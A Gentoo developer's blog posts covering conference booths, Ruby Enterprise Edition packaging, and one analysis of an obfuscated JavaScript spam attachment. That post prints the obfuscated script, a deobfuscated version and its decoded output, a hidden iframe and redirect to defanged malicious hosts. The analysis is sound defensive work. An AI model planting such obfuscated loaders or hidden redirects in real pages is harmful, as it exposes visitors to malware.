Gentoo @ Linuxtag 2011

2011-05-10T22:00:00Z

Greetings from Berlin and the first day of LinuxTag 2011!

We have set up our booth (152b in Hall 7.2b) yesterday to be ready for all the visitors.

This year, we're glad to have new merchandise to offer:

Great mugs featuring Larry the Cow!

Also, we have the posters that Sebastian blogged about a few days ago for free!

Come by and get the latest Gentoo schwag and a chance to talk to/yell at/bribe/hug/meet some of our devs.

Gentoo @ 27C3

2010-12-24T23:00:00Z

Yes we will be there! Compiling all the way...

You can find the Gentoo folks on Level C, next to Debian.

Come visit us for live bugfixing, support, ebuild writing, bug wrangling, CFLAGS comparing, Mate drinking and whatever else you want to do :)

Looking At Obfuscated Javascript Spam

2010-09-19T22:00:00Z

The typical Gentoo developer tends to get a lot of email, and that usually means a lot of spam. Today, a massive amount of nasty spam messages arrived in my inbox, sadly they weren't caught by any spamassassins on the way to my inbox:

Subject: notes from last week
Date: Mon, 20 Sep 2010 10:57:09 -0600

Attached are notes from last week. Let me know if there are any errors or major omissions. Thanks.

[77476Officers Meeting.html  text/html (649 bytes)]

So I had 25 emails, all with a around 650 bytes of html attached, all escaping the spam filters. Okay, you caught my attention, stop sending emails already. Let's see:

<script language="JavaScript" type="text/javascript">function p2gd(wja8){var
jty7,lwpr="",uuar="qhliu-t\"x=; o/>.n0egc:pmsvafr<",ss0n,gpck,x4ab=uuar.length;eval(unescape("%66un%63ti%6Fn v%79dc%28cm%798){%6Cwp%72+=%63my8%7D"));for(jty7=0;jty7<wja8.length;jty7++){gpck=wja8.charAt(jty7);ss0n=uuar.indexOf(gpck);if(ss0n>-1){ss0n-=(jty7+1)%x4ab;if(ss0n<0){ss0n+=x4ab;}vydc(uuar.charAt(ss0n));}else{vydc(gpck);}}eval(unescape("%64oc%75me%6Et.w%72it%65(l%77pr)%3Blw%70r=%22%22;"));}p2gd("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>

Oh, lots of obfuscated code. Especially interesting is the Javascript (with the blue background). After properly indenting and renaming the variables to something useful, you'll get this:

function func_1(param){
    var i,
    output="",
    str1="qhliu-t\"x=; o/>.n0egc:pmsvafr<",
    str1_position,
    param_char,
    str1_length=str1.length;
    
    function add_to_output(str) { // was eval(unescape(...));
        output += str;
    }

    for(i = 0; i < param.length; i++) {
        param_char = param.charAt(i);
        str1_position = str1.indexOf(param_char);
        if(str1_position > -1) {
            str1_position -= (i+1) % str1_length;
            if (str1_position < 0) {
                str1_position += str1_length;
            }
            add_to_output(str1.charAt(str1_position));
        } else {
            add_to_output(param_char);
        }
    }

    document.write(output); // was eval(unescape(...));
    output="";
}

func_1("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");

What you can see is a function func_1 that is called with a string that looks like gibberish as parameter (line 32). The function then iterates over every char in that string (line 14), does some magic to select a certain character from str1 or param, and then adds it to the output variable (line 22 or 24).

Looking at that character selection algorithm, you can see that it first checks if the selected character from param is included in str1. If that is the case, it'll pick one character from str1, following the calculation in line 18. I'm not a crypto expert, but I think that snippet is similar to a Polyalphabetic cipher like the Vigenère cipher. The modulo used in the calculation wraps the key (str1) so that it matches the length of param.

So it generates a string, and then writes it into the document, thus making the Browser parse it (line 61).

Cutting the long story short

That string it generates is sadly quite boring...

I used a website called jsunpack to see the generated code, you might as well have replaced the document.write with alert(), but meh.

Here's the text:

PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=hXXp://scaner-high.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="hXXp://finwizonline.com/news/"></iframe>

It renders an iframe that links to a PHP script which likely is a "how many people clicked this" counter and will redirect people to that website in four seconds to ensure they have been counted.

That /news/ website again redirects to another website which is no longer available. :( At least a Google search suggests that this site hosts malicious content, Windows trojans specifically.

yawn

So, nothing to fear for us Linux people. It started being quite interesting, but besides an interesting obfuscation method, there were no fancy exploits to find.

I'll go setup a spamasassin rule to finally get rid of these messages now. sigh

Awesome things to do with Gentoo and three commands (1)

2010-05-22T22:00:00Z

today: Installing Ruby on Rails with Ruby Enterprise Edition (assuming a ~arch system):

# echo 'RUBY_TARGETS="ruby18 ree18"' >> /etc/make.conf
# emerge rails
# eselect ruby set rubyee18

next week: World domination with three easy commands. ;p

Enterprisey Stuff

2010-04-02T22:00:00Z

Just a quick message: I have added Ruby Enterprise Edition to the Portage tree, ready for the adventurous to test ;)

The package is in dev-lang/ruby-enterprise, but you'll need to unmask it first. To install rubygems, you should also unmask the ruby_targets_ree18 USE flag in /etc/portage/profile/use.mask.

The usual disclaimer: The package might still kill little bonsaikittens, so be careful!
Does it work? Does it not? Let us know: #gentoo-ruby on freenode as usual.

~a3li/